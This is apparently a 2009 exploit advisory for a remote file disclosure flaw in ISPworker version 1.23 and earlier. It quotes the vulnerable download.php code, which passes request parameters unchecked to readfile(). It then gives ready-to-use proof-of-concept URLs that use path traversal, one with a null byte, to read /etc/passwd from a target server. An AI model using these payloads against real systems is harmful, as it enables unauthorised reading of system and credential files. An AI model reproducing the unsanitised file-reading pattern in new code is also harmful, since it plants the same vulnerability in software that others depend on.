49 lines
No EOL
1.3 KiB
Text
49 lines
No EOL
1.3 KiB
Text
[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]
|
|
|
|
|
|
|
|
########################################################################
|
|
|
|
#ISPworker <= 1.23 Remote File Disclosure exploit
|
|
|
|
#Download Script : http://www.ispware.de/_files/ispworker-1.23.tar.gz
|
|
|
|
#Dork : die("lamers attempt"); :P
|
|
|
|
########################################################################
|
|
|
|
#
|
|
|
|
#Vuln : ./ispworker-1.23/files/ispworker/module/ticket/download.php
|
|
|
|
#
|
|
|
|
# <?header('Content-type: '.$_REQUEST[type]);
|
|
|
|
# header('Content-Disposition: attachment; filename="'.$_REQUEST[filename].'"');
|
|
|
|
# readfile("./tmp/$ticketid"."_".$_REQUEST[filename]);
|
|
|
|
# ?>
|
|
|
|
#
|
|
|
|
#PoC : http://[target]/[path]/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00
|
|
|
|
# http://[target]/[path]/module/ticket/download.php?filename=../../../../../../../../../etc/passwd
|
|
|
|
#
|
|
|
|
########################################################################
|
|
|
|
########################################################################
|
|
|
|
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
|
|
|
|
########################################################################
|
|
|
|
########################################################################
|
|
|
|
|
|
|
|
[ Gorontalo / 2009 ] |